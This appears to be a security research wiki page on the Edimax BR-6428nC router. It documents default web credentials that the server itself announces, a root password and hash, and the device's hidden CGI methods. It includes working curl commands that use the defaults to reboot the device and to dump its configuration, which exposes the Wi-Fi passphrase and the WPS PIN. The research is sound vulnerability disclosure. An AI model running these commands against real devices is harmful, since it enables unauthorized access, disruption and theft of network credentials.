Examination of Edimax home devices
Jump to navigation
Jump to search
ⓘ Table of Contents
Summary
Edimax Technology focuses on networking devices for home applications. The device under investigation here showed a vulnerability to inject almost any command as root by calling a Common Gateway Interface (CGI) for any attacker, which has access to the network and knows the HTTP authentication. Where the default credentials are communicated by the webserver when executing basic NMAP scan.
Introduction
Since Edimax’s establishment in 1986, they have grown to be one of the world’s leading manufacturers of advanced network communication products. Edimax Technology is dedicated to the design, development, manufacture, and marketing of a broad range of networking solutions. The company’s core values include quality service, professional R&D and innovation. Edimax products are all CE, FCC and C-Tick emission certified. Our wireless 802.11n and 802.11ac range is Wi-Fi certified and our drivers are tested by Microsoft and NSTL to ensure interoperability. In addition to being ISO 9001 and ISO 14000 certified in 2003, Edimax has formed strategic partnerships with several chipset vendors. Edimax is also an active member of both the Wi-Fi Alliance and the Gigabit Ethernet Alliance.
Edimax is committed to bring the latest networking technologies to the customer at the most affordable price. Their wide and comprehensive product lines satisfy the connectivity needs of any networking architecture or application for home and business. The complete range of our products include wireless solutions, print servers, xDSL routers, Ethernet switches, PoE solutions, powerline solutions, network access controllers, load balancer solutions, network cameras, professional surveillance cameras, VoIP solutions, KVM switches, media converters, home entertainment integration solutions and other customer-oriented networking applications. Additionally we offer the high-performance Edimax Pro range of enterprise solutions.
Source: [Edimax Profile]
Edimax BR-6428nC: N300 Wireless Router
The BR-6428nC is a 300Mbps high-speed multi-function Wi-Fi solution which supports IEEE 802.11b/g/n standards and provides significantly improved coverage with the 9dBi antenna. Operating as a router, access point or range extender, the BR-6428nC’s flexibility meets the demands of any networking applications. Impressive performance and a competitive price make the BR-6428nC a cost-effective solution for home or small office environments.
Source: [Product Link]
Examination
Summary
ⓘ Collected Information
| Device Model | BR-6428nC |
| Manufacturer | Edimax |
| Product Type | Router |
| Description | 3-in-1 Router, AP, and Range Extender |
| Price on Release | 30 Euro |
| Release | 2015 Q1 (Continuing as of April 2020) |
| State of Research | It was not possible to enable input via UART; the board shows several soldering points; Only bootlog information could be capured |
| Ports | 4xGbE, 2xWLAN Antenna |
| Buttons | WPS/Reset |
| LED | Power, WLAN, WAN, 4xLAN |
| Power | 5V/1A DC |
| WLAN | 2,4GHz 802.11b/g/n up to 300MBit/s |
| Other | N/A |
| FCC-ID | NDD9564281303 |
| System | RTL8196E_1200 |
| Processor | RTL8196E 2014.09.22 v0.3 [16bit] (380MHz) |
| BogoMIPS | |
| Memory | DRAM: 16MB [16bit] |
| Storage | |
| Ethernet MAC | 74:DA38:F8:DE:E5 |
| WLAN MAC | 74:DA38:F8:DE:E4 |
| WLAN SSID | edimax.setup (Changed during setup) |
| WLAN PSK | |
| Default IPv4 | 192.168.2.1 |
| Hostname | |
| NET Protocols | |
| Interfaces | |
| Ports | |
| Webpage | https://edimax.setup |
| Webaccess | admin: 1234 |
| Root Password | edimaxens (init.sh); $1$iNT/snisG/y7YBVbw0tQaaaA (boa.passwd) |
| Other Login Pw | |
| Firmware | v1.16 |
| Hardware | Rev. A |
| Baudrate | 38400 (8N1) |
| Bootdelay | 1s |
| Bootloader | Access by pressing ESC or the WPS button on boot. |
| mtdparts | |
| Filesystem | squashfs |
| Image | |
| Linux | 2.4.18 |
| Kernel cmdline | root=/dev/mtdblock1 fconsole=0 single |
| Shell | |
| BusyBox | |
| Services |
Network Mapper
ⓘ Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
Wide Area Network (WAN)
Host is up.
All 1000 scanned ports on 192.168.86.40 are filtered
Local Area Network (LAN)
PORT STATE SERVICE VERSION 80/tcp open http Boa HTTPd 0.94.14rc21 | http-auth: | HTTP/1.1 401 Unauthorized\x0D | Server returned status 401 but the WWW-Authenticate header could not be parsed. |_ WWW-Authenticate: Basic realm="Default Name:admin Password:1234 |_http-server-header: Boa/0.94.14rc21 |_http-title: 400 Bad Request 52881/tcp open upnp MiniUPnP
Note: This scan has been executed after a basic setup without applying any custom firmware configuration.
Warning: The webserver is communicating the default credentials.
Web Interface
The BR-6428nC can work as router, access point or range extender. One of these modes can be selected during the setup by browsing to http://edimax.setup and following the step-by-step procedure as shown below.
Note: The SSID, which was edimax.setup too, has to be changed during the setup, but the webserver will still respond to http://edimax.setup after the initial setup. The Web Interface is protected by HTTP Authentication mechanism with the default credentials admin:1234, which are already communicated by the webserver when executing a NMAP scan.
ⓘ Edimax BR-6428nC v1.16: Setup
- Wifi-Router Mode
aindex.asp
wiz_3in1.asp
hwsetup.asp
detect.asp
aconnected.asp
wifi.asp
conclusion.asp
last.asp
ⓘ Edimax BR-6428nC v1.16: Configuration
Note: Default credentials: admin:1234
Status
- LUPUS XT2 Plus: Unauthorized Login
Status
Setup Wizard
- LUPUS XT2 Plus: Unauthorized Login
Setup Wizzard
Internet
- LUPUS XT2 Plus: Unauthorized Login
WAN Setup
DDNS
LAN
- LUPUS XT2 Plus: Unauthorized Login
LAN
Wireless
- LUPUS XT2 Plus: Unauthorized Login
Basic
Guest
WPS
Access Control
Schedule
Firewall
- LUPUS XT2 Plus: Unauthorized Login
Firewall
URL blocking
Access Control
DMZ
DoS
QoS
- LUPUS XT2 Plus: Unauthorized Login
QoS
Advance
- LUPUS XT2 Plus: Unauthorized Login
Static Routing
Port Forwarding
Virtual Server
Wireless
ALG
IGMP
UPnP
Administration
- LUPUS XT2 Plus: Unauthorized Login
Time Zone
- Edimax BR-6428nC webpage config 26 Administration password.png
Password
Remote Access
Backup Restore
Upgrade
Restart
Logs
Active DHCP Clients
Statistics
The web interface itself provides a lot of configuration options which are accessbible over CGIs integrated with the BOA webserver. The GCI code is called when submitting a form on the regular ASP webpage and the sourcecode is not available when extracting the firmware. Since the CGI has always the same form of /goform/$METHOD, it is rather simple to recursivly search for all employed CGI methods within the web root directory, which is listed below including the BOA configuration.
ⓘ Edimax BR-6428nC v1.16: BOA root directory
└── web
├── FUNCTION_SCRIPT
├── aIndex.asp
├── aconnected.asp
├── addPC.asp
├── adhcp_fail.asp
├── admin_activeDhcpClient.asp
├── admin_backrestore.asp
├── admin_logs.asp
├── admin_logs2.asp
├── admin_password.asp
├── admin_remotmang.asp
├── admin_restart.asp
├── admin_statistics.asp
├── admin_timezone.asp
├── admin_upgrade.asp
├── adv_alg.asp
├── adv_dmz.asp
├── adv_dos.asp
├── adv_firewal.asp
├── adv_igmp.asp
├── adv_portforward.asp
├── adv_staticrout.asp
├── adv_upnp.asp
├── adv_virtserver.asp
├── adv_wireless.asp
├── advanced_management.asp
├── afail.asp
├── apppoe.asp
├── conclusion.asp
├── conn_test.asp
├── connect_redirect.asp
├── connectmsg.asp
├── detect.asp
├── file
│ ├── allasp-n.var
│ ├── autowan.var
│ ├── javascript.js
│ ├── jquery-1.7.1.min.js
│ ├── multilanguage.var
│ ├── p6.gif
│ └── set.css
├── graphics
│ ├── ap_mode.jpg
│ ├── ap_setup.gif
│ ├── back-a.gif
│ ├── banner.png
│ ├── bg.jpg
│ ├── bg1.jpg
│ ├── cancel.png
│ ├── check.png
│ ├── dot-1.png
│ ├── dot-2.png
│ ├── loading.gif
│ ├── logo.gif
│ ├── no_connect.jpg
│ ├── repeater_mode.jpg
│ ├── repeater_setup.gif
│ ├── router_mode.jpg
│ ├── router_setup.gif
│ ├── step1.jpg
│ ├── step2.jpg
│ ├── step3.jpg
│ ├── step4.jpg
│ └── wifi_24G.png
├── guest_wireless_basic.asp
├── hwsetup.asp
├── index.asp
├── index1.asp
├── inter_ddns.asp
├── inter_wan.asp
├── lan.asp
├── lan_ap.asp
├── last.asp
├── left_list.asp
├── left_list_ap.asp
├── left_list_rep.asp
├── main.asp
├── mdhcp.asp
├── mfail.asp
├── ml2tp.asp
├── mp.asp
├── mpppoe.asp
├── mpptp.asp
├── mstart.asp
├── mstatic.asp
├── msuccess.asp
├── probe.asp
├── qos.asp
├── qosadd.asp
├── redirect.asp
├── replace.asp
├── security_block.asp
├── security_block1.asp
├── set.css
├── setup_3wizard.asp
├── setup_3wizard_1.asp
├── setup_3wizard_2.asp
├── setup_3wizard_3.asp
├── setup_wizard.asp
├── status.asp
├── status_noInternet.asp
├── wifi.asp
├── wireless_access.asp
├── wireless_basic.asp
├── wireless_schedule.asp
├── wireless_wps.asp
├── wisp_wlsurvey.asp
├── wiz_3in1.asp
├── wiz_apmode1.asp
├── wiz_ip.asp
├── wiz_repeatermode1.asp
├── wiz_repeatermode2.asp
├── wizard_security.asp
├── wlClient.asp
├── wlWDS3_key.asp
├── wlWDS4_key.asp
├── wlWDS5_key.asp
└── wlsurvey.asp
ⓘ Edimax BR-6428nC v1.16: boa.config
Port 80 User root ServerAdmin root@localhost ServerName "" DocumentRoot /web UserDir public_html DirectoryIndex index1.asp DirectoryMaker /usr/lib/boa/boa_indexer KeepAliveMax 1000 KeepAliveTimeout 10 MimeTypes /etc/boa/mime.types DefaultType text/plain AddType application/x-httpd-cgi asp Auth / /etc/boa/boa.passwd PidFile /var/run/webs.pid
Note: All webpages under /web are herewith protected agains unauthorized access.
In order to investigate further for vulnerabilities of these CGI methods, the GLP Source Code has been of great use, which is also availible in the product's download section. Using the GLP Source Code, the investigation started by looking into the C source code of the BOA server under RTL8196C_Edimax/AP/boa-0.94.14rc21/src/. Here, the file fmmgmt.c contains all the CGI callable functions' source code.
ⓘ Edimax BR-6428nC v1.16: CGI callable methods
formAccept (Parameter: {"submit-url"})
(!) formReboot (Parameter: {"submit-url"})
formApply (Parameter: {"submit-url"})
formConnect (Parameter: {"submit-url", "wanMode": int, "buttonact": {"Connect", "Disconnect"}})
formSysLog (Parameter: {"submit-url", "send": {"1", "0"}, "reset": {"1", "0"}})
formSecLog (Parameter: {"submit-url", "send": {"1", "0"}, "reset": {"1", "0"}})
(!) formDebug (Parameter: {"password": "report.txt"})
formSaveConfig (Parameter: {"save-cs", "save", "save-hs", "save-ds", "save-all"})
formUploadConfig (Parameter: {postData})
(!!) formwizResetDefault(Parameter: None)
(!!) formResetDefault (Parameter: None)
formUpload (Parameter: {"submit-url", postData})
formPasswordSetup (Parameter: {"newpass", "oldpass", "submit-url"})
formStats (Parameter: {"submit-url"})
(!!!) mp (Parameter: {"command"})
formrefresh (Parameter: {"filtermode": {"1", "0"}, "submit-url"})
formAdvManagement (Parameter: {"AdvSetup_verifyCode": {"Edimax"}, "AdvSetup_manualAdaptivityEnabled": {"1", "0"}, "AdvSetup_adaptivity24g": {"1", "0"}, "AdvSetup_into_effect"})
ⓘ Example 1: formReboot
$ curl --User admin:1234 192.168.2.1/goform/formReboot --data ''
<html>
<!--OK_MSG3--><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<link rel="stylesheet" href="/set.css?time=201509241321">
<meta http-equiv="Content-Type" content="text/html">
<script type="text/javascript" src="/file/javascript.js?time=201509241321"></script>
<script type="text/javascript" src="/file/multilanguage.var?time=201509241321"></script>
<title></title>
</head>
<body>
<blockquote><br><br><div class="restartInfo"><script>document.write(showText(SystemRestarting));</script></div><br><br>
<form name="test">
<script>document.write('<input type=button name="okbutton" value="'+showText(OK)+'" class="ui-button" OnClick=window.location.replace("")>');</script>
</form>
</blockquote>
<script>
var secs = 60;
var wait = secs * 1000;
document.test.okbutton.value = showText(OK) + "(" + secs + ")";
document.test.okbutton.disabled = true;
for(i = 1; i <= secs; i++) setTimeout("update(" + i + ")", i * 1000);
setTimeout("timer()", wait);
function update(num, value)
{
if (num == (wait/1000)) document.test.okbutton.value = showText(OK);
else
{
printnr = (wait / 1000)-num;
document.test.okbutton.value = showText(OK) + "(" + printnr + ")";
}
}
function timer()
{
document.test.okbutton.disabled = false;
document.test.okbutton.value = showText(OK);
}
</script>
</body>
</html>
ⓘ Example 2: formdebug
$ curl --User admin:1234 192.168.2.1/goform/formDebug --data 'password=report.txt'
System Log create time : 2020-05-02 15:39:25
Firmware Version: 1.16
Compiler date: 2015.09.24-13:21:41
------ Config setting -------
HW_BOARD_ID=1
HW_NIC0_ADDR=74da38f8dee4
HW_NIC1_ADDR=74da38f8dee5
HW_WLAN_ADDR=74da38f8dee4
HW_WLAN_ADDR1=00e04c8196c2
HW_WLAN_ADDR2=00e04c8196c3
HW_WLAN_ADDR3=00e04c8196c4
HW_WLAN_ADDR4=00e04c8196c5
HW_WLAN_ADDR5=00e04c8196c6
HW_WLAN_ADDR6=00e04c8196c7
HW_WLAN_ADDR7=00e04c8196c8
HW_REG_DOMAIN=3
HW_RF_TYPE=10
HW_TX_POWER_CCK_A=2424242424242424242525252525
HW_TX_POWER_CCK_B=0000000000000000000000000000
HW_TX_POWER_HT40_1S_A=2525252525252525252727272727
HW_TX_POWER_HT40_1S_B=3030303030303030302e2e2e2e2e
HW_TX_POWER_DIFF_HT40_2S=0000000000000000000000000000
HW_TX_POWER_DIFF_HT20=000000000000000000f0f0f0f0f0
HW_TX_POWER_DIFF_OFDM=1212121212121212120202020202
HW_11N_XCAP=49
HW_11N_TSSI1=0
HW_11N_TSSI2=0
HW_11N_THER=35
HW_11N_TRSWITCH=0
HW_PWTBL_B=68
HW_PWTBL_G=170
HW_PWTBL_N_20M=170
HW_PWTBL_N_40M=136
HW_PWTBL_ENABLE=1
HW_11N_RESERVED7=0
HW_11N_RESERVED8=0
HW_11N_RESERVED9=0
HW_11N_RESERVED10=0
HW_LED_TYPE=0
HW_TX_POWER_5G_HT40_1S_A=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_5G_HT40_1S_B=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_DIFF_5G_HT40_2S=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_DIFF_5G_HT20=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_TX_POWER_DIFF_5G_OFDM=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
HW_WSC_PIN=''
DHCP_CLIENT_START='192.168.2.100'
DHCP_CLIENT_END='192.168.2.200'
LICENCE=1
WAN_DHCP=0
DNS_MODE=0
DNS1='0.0.0.0'
DNS2='0.0.0.0'
DNS3='0.0.0.0'
WAN_MODE=0
DYNIP_HOSTNAME=""
WAN_MAC_ADDR=000000000000
WAN_IP_ADDR='172.1.1.1'
WAN_SUBNET_MASK='255.255.0.0'
WAN_DEFAULT_GATEWAY='172.1.1.254'
PPP_USER_NAME=''
PPP_IDLE_TIME=600
PPP_CONNECT_TYPE=0
PPP_SERVNAME=''
PPP_MTU=1392
PPP_TTL_ENABLED=0
PPTP_IPMODE=0
PPTP_IP_ADDR='0.0.0.0'
PPTP_IP_MASK_ADDR='0.0.0.0'
PPTP_DEF_GATEWAY='0.0.0.0'
PPTP_GATEWAY='0.0.0.0'
PPTP_USER_NAME=''
PPTP_IDLE_TIME=600
PPTP_CONNECT_TYPE=0
PPTP_CONNT_ID=''
PPTP_BEZEQ_ENABLED=0
PPTP_MTU=1392
L2TP_IPMODE=0
L2TP_IP_ADDR='0.0.0.0'
L2TP_MASK_ADDR='0.0.0.0'
L2TP_DEFGATEWAY='0.0.0.0'
L2TP_GATEWAY=''
L2TP_USER_NAME=''
L2TP_IDLE_TIME=600
L2TP_CONNECT_TYPE=0
L2TP_MTU=1392
TELBP_IP_ADDR='0.0.0.0'
TELBP_USER_NAME=''
TELBP_ENABLED=0
PORTFW_ENABLED=0
PORTFW_TBL_NUM=0
IPFILTER_ENABLED=0
IPFILTER_TBL_NUM=0
DMZ_TBL_NUM=0
URLB_ENABLED=0
URLB_TBL_NUM=0
ACPC_ENABLED=0
IPDENY_ENABLED=1
ACPC_TBL_NUM=0
MACDENY_ENABLED=1
MACFILTER_ENABLED=0
MACFILTER_TBL_NUM=0
PORTFILTER_ENABLED=0
PORTFILTER_TBL_NUM=0
TRIGGERPORT_ENABLED=0
TRIGGERPORT_TBL_NUM=0
DMZ_ENABLED=0
SROUT_ENABLED=0
SROUT_TBL_NUM=0
WAN1_QOS_ENABLED=0
WAN1_QOS_TBL_NUM=0
SDHCP_ENABLED=0
SDHCP_TBL_NUM=0
WLAN_TX_POWER=0
WLAN_WMM=1
WLAN_TURBO=0
WLAN_N_FIXRATE=0
WLAN_N_CHAN_WIDTH=1
WLAN_TRAN_RATE='auto'
WLAN_RATE_MODE=0
WLAN_CTS=0
WLAN_BURST=0
WEP152_KEY1=00000000000000000000000000000000
WEP152_KEY2=00000000000000000000000000000000
WEP152_KEY3=00000000000000000000000000000000
WEP152_KEY4=00000000000000000000000000000000
DOT1X_MODE=0
ELAN_MAC_ADDR=000000000000
WLAN_MAC_ADDR=000000000000
SSID="edimax.BR-6428nC"
CHANNEL=0
WEP=0
WEP64_KEY1=0000000000
WEP64_KEY2=0000000000
WEP64_KEY3=0000000000
WEP64_KEY4=0000000000
WEP128_KEY1=00000000000000000000000000
WEP128_KEY2=00000000000000000000000000
WEP128_KEY3=00000000000000000000000000
WEP128_KEY4=00000000000000000000000000
WEP_DEFAULT_KEY=0
WEP_KEY_TYPE=1
FRAG_THRESHOLD=2346
SUPPORTED_RATES=4095
BEACON_INTERVAL=100
PREAMBLE_TYPE=0
BASIC_RATES=15
RTS_THRESHOLD=2347
AUTH_TYPE=2
HIDDEN_SSID=0
WLAN_DISABLED=0
INACTIVITY_TIME=30000
RATE_ADAPTIVE_ENABLED=1
DTIM_PERIOD=3
NETWORK_TYPE=0
IAPP_DISABLED=0
PROTECTION_DISABLED=1
MACCLONE_ENABLED=0
BAND=5
FIX_RATE=0
WPA2_PRE_AUTH=0
WPA2_CIPHER_SUITE=2
WLAN_SET_TX=0
AP_MODE=0
SECURITY_MODE=2
CLIENT_IP_DISABLED=0
WLAN_BLOCK_RELAY=0
AUTO_MAC_CLONE=0
OP_MODE=0
WISP_WAN_ID=0
WL_LINKMAC1=000000000000
WL_LINKMAC2=000000000000
WL_LINKMAC3=000000000000
WL_LINKMAC4=000000000000
WL_LINKMAC5=000000000000
WL_LINKMAC6=000000000000
WDS_ENABLED=0
WLAN_WDS_ENCRYPT=0
WLAN_WDS_WPA_AUTH=2
WLAN_WDS_WPA_CIPHER_SUITE=1
WLAN_WDS_WPA2_CIPHER_SUITE=0
WLAN_WDS_WPA_PSK=""
WLAN_WDS_PSK_FORMAT=0
WLAN_ENCRYPT=4
WLAN_ENABLE_SUPP_NONWPA=0
WLAN_SUPP_NONWPA=0
WLAN_WPA_AUTH=2
WLAN_WPA_CIPHER_SUITE=0
WLAN_WPA_PSK="\$uePa_\$3cUrrr3_Pw"
WLAN_WPA_GROUP_REKEY_TIME=86400
MAC_AUTH_ENABLED=0
RS_IP='0.0.0.0'
RS_PORT=1812
RS_MAXRETRY=3
RS_INTERVAL_TIME=5
ACCOUNT_RS_ENABLED=0
ACCOUNT_RS_IP='0.0.0.0'
ACCOUNT_RS_PORT=1813
ACCOUNT_RS_UPDATE_ENABLED=0
ACCOUNT_RS_UPDATE_DELAY=60
ACCOUNT_RS_MAXRETRY=3
ACCOUNT_RS_INTERVAL_TIME=5
WLAN_ENABLE_1X=0
WLAN_PSK_FORMAT=0
IP_ADDR='192.168.2.1'
DHCPGATEWAYIP_ADDR='0.0.0.0'
DHCPNAMESERVER_ADDR='0.0.0.0'
DOMAIN_NAME=''
LAN_LEASE_TIME=3600
SUBNET_MASK='255.255.255.0'
DEFAULT_GATEWAY='0.0.0.0'
DHCP=2
STP_ENABLED=0
WLAN_MACAC_NUM=0
WLAN_MACAC_ENABLED=0
SUPER_NAME='super'
USER_NAME='admin'
TIME_ZONE_SEL=22
START_MONTH=1
START_DAY=1
END_MONTH=1
END_DAY=1
TIMESERVER_ADDR='59.124.196.83'
DAYLIGHT_ENABLE=0
REMANHOST_ADDR='0.0.0.0'
REMAN_PORT=8080
REMANG_ENABLE=0
UPNP_ENABLE=0
NAT_ENABLE=1
FAST_NAT_ENABLE=0
FIREWALL_ENABLE=1
VSER_ENABLED=0
VSER_TBL_NUM=0
POD_ENABLED=0
PIN_ENABLED=0
SCAN_ENABLED=0
SYN_ENABLED=0
POD_PACK=5
POD_TIME=0
POD_BUR=5
SYN_PACK=30
SYN_TIME=0
SYN_BUR=30
SCAN_NUM=nmap,xmastree,axmastree,nullscan,synrst,synfin,synouport
DDNS_NAME=''
DDNS_ACCOUNT=''
DDNS_PASS=''
DDNS_ENABLED=0
DDNS_PVID_SEL='dyndns'
APP_LAYER_GATEWAY=ftp,h323,ipsec,pptp,l2tp,sip
DHIS_HOSTID=0
DHIS_ISADDR='0.0.0.0'
DHIS_AUTH_P1=''
DHIS_AUTH_P2=''
DHIS_AUTH_Q1=''
DHIS_AUTH_Q2=''
DHIS_SELECT=0
MAX_DOWNLOAD_BANDWIDTH=0
MAX_UPLOAD_BANDWIDTH=0
REPEATER_ENABLED=0
REPEATER_SSID=""
PS_ENABLE=1
PS_IPPENABLE=1
PS_LPRENABLE=1
PS_NAME=''
PS_PORT1NAME='lpt1'
PS_PORT2NAME=''
AP_ROUTER_SWITCH=0
WPS_ENABLE=1
WPS_CONFIG_MODE=7
WPS_PROXY_ENABLE=0
WPS_INTERNAL_REG=0
WPS_CONFIG_TYPE=1
WPS_CONFIG_STATUS=1
WPS_PIN_CODE='58340844'
WPS_DISPLAY_KEY=0
WLAN_NOFORWARD=0
DDNS_STATUS=0
AUTO_BRIDGE=0
WIFI_TEST=0
IS_RESET_DEFAULT=1
IGMP_PROXY_ENABLED=1
BAND_1=0
SSID_1="edimax.guest"
WEP64_KEY1_1=0000000000
WEP64_KEY2_1=0000000000
WEP64_KEY3_1=0000000000
WEP64_KEY4_1=0000000000
WEP128_KEY1_1=00000000000000000000000000
WEP128_KEY2_1=00000000000000000000000000
WEP128_KEY3_1=00000000000000000000000000
WEP128_KEY4_1=00000000000000000000000000
WLAN_WPA_PSK_1=""
SECURITY_MODE_1=0
WLAN_ENABLE_1X_1=0
WEP_1=0
WEP_KEY_TYPE_1=0
WLAN_WPA_CIPHER_SUITE_1=1
WPA2_CIPHER_SUITE_1=0
WLAN_PSK_FORMAT_1=0
WEP_DEFAULT_KEY_1=0
SSID_MIRROR_1=0
FIX_RATE_1=0
HIDDEN_SSID_1=0
WLAN_WMM_1=0
WLAN_ACCESS_1=0
WLAN_ENCRYPT_1=0
AUTH_TYPE_1=0
WLAN_WPA_AUTH_1=2
WLAN_SCH_ENABLED=0
WLAN_SCH_NUM=0
STADRV_SSID=""
STADRV_CHANNEL=0
STADRV_BAND=0
STADRV_ENCRYPT_TYPE=0
STADRV_WEP_LENGTH=0
STADRV_WEP_FORMAT1=0
STADRV_WEP_FORMAT2=0
MANUAL_ADAPTIVITY_ENABLE=0
ADAPTIVITY_24G_ENABLE=0
STADRV_WEP_DEFAULT_KEY=0
STADRV_WPA_CIPHER=1
STADRV_PSK_FORMAT=0
STADRV_WEPKEY1=''
STADRV_WEPKEY2=''
STADRV_WEPKEY3=''
STADRV_WEPKEY4=''
STADRV_PSKKEY=''
STADRV_CLONEMAC=000000000000
DUALL_ACCESS_ENABLE=0
DUALL_ACCESS_MODE=0
DUAL_WAN_IGMP=0
SERVER_SEL=0
SERVER_AUTO=0
DHCP_MTU=1500
STATIC_MTU=1500
IGMPSNOOP_ENABLE=1
WIZ_MODE=0
IQ_DONE=1
DHCP_SWITCH=1
DHCP_CHECK_ENABLED=0
WLAN_BLOCK_RELAY_1=0
WLAN_BLOCK_RELAY_2=0
WLAN_BLOCK_RELAY_3=0
WLAN_BLOCK_RELAY_4=0
_WAN_IF_="eth1"
_LAN_IF_="eth0"
-----------------------------
#############################
# meminfo #
#############################
total: used: free: shared: buffers: cached:
Mem: 10895360 8724480 2170880 0 790528 2813952
Swap: 0 0 0
MemTotal: 10640 kB
MemFree: 2120 kB
MemShared: 0 kB
Buffers: 772 kB
Cached: 2748 kB
SwapCached: 0 kB
Active: 1648 kB
Inactive: 3372 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 10640 kB
LowFree: 2120 kB
SwapTotal: 0 kB
SwapFree: 0 kB
#############################
# modules #
#############################
#############################
# ps #
#############################
PID USER VSZ STAT COMMAND
1 root 1140 S init
2 root 0 SW [keventd]
3 root 0 SWN [ksoftirqd_CPU0]
4 root 0 SW [kswapd]
5 root 0 SW [bdflush]
6 root 0 SW [kupdated]
7 root 0 SW [mtdblockd]
9 root 1160 S -/bin/sh
65 root 1240 S syslogd -C
66 root 848 S reload
442 root 1140 S udhcpd /var/udhcpd.conf
480 root 988 S lld2d br0
611 root 1384 S dnrd -c off --server=192.168.86.1
814 root 1256 S /bin/sh /bin/cleanlog.sh
815 root 852 S setup
833 root 1148 S crond -L /var/cron/crond.log -l 0
884 root 1840 S webs
1030 root 864 S iapp br0 wlan0
1102 root 1180 S wscd -start -c /var/wsc.conf -w wlan0 -fi /var/wscd-w
1107 root 888 S iwcontrol wlan0
1146 root 888 S /bin/igmpproxy eth1 br0 -D
1147 root 1144 S udhcpc -i eth1 -p /var/udhcpc/udhcpc-eth1.pid -s /etc
2193 root 1136 S sleep 10
2248 root 1140 S sh -c /bin/savelog.sh
2249 root 1240 S /bin/sh /bin/savelog.sh
2257 root 1140 R ps -ax
#############################
# ifconfig #
#############################
br0 Link encap:Ethernet HWaddr 74:DA:38:F8:DE:E4
inet addr:192.168.2.1 Bcast:192.168.2.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:120 errors:0 dropped:0 overruns:0 frame:0
TX packets:135 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15035 (14.6 KiB) TX bytes:26691 (26.0 KiB)
eth0 Link encap:Ethernet HWaddr 74:DA:38:F8:DE:E4
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:120 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 B) TX bytes:24699 (24.1 KiB)
Interrupt:2 Base address:0x4000
eth1 Link encap:Ethernet HWaddr 74:DA:38:F8:DE:E5
inet addr:192.168.86.32 Bcast:192.168.86.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:666 errors:0 dropped:0 overruns:0 frame:0
TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:112288 (109.6 KiB) TX bytes:2834 (2.7 KiB)
Interrupt:2 Base address:0x4000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.255.255.255
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr 74:DA:38:F8:DE:E4
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3048 errors:0 dropped:0 overruns:0 frame:0
TX packets:197 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:702678 (686.2 KiB) TX bytes:49984 (48.8 KiB)
Interrupt:21
#############################
# route #
#############################
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
224.0.1.178 0.0.0.0 255.255.255.255 UH 0 0 0 br0
192.168.86.1 0.0.0.0 255.255.255.255 UH 0 0 0 eth1
239.255.255.250 0.0.0.0 255.255.255.255 UH 0 0 0 br0
192.168.86.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 br0
0.0.0.0 192.168.86.1 0.0.0.0 UG 0 0 0 eth1
#############################
# iptables -L -xv #
#############################
Chain INPUT (policy ACCEPT 446 packets, 92389 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP tcp -- eth1 * 0.0.0.0/0 192.168.86.32 tcp flags:0x3F/0x02
0 0 DROP tcp -- eth1 * 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00
0 0 DROP tcp -- eth1 * 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x01
0 0 DROP tcp -- eth1 * 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x29
0 0 DROP tcp -- eth1 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
0 0 DROP udp -- eth1 * 0.0.0.0/0 0.0.0.0/0 udp dpt:53
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 135 packets, 24521 bytes)
pkts bytes target prot opt in out source destination
#############################
# iptables -L -t nat -xv #
#############################
Chain PREROUTING (policy ACCEPT 88 packets, 16398 bytes)
pkts bytes target prot opt in out source destination
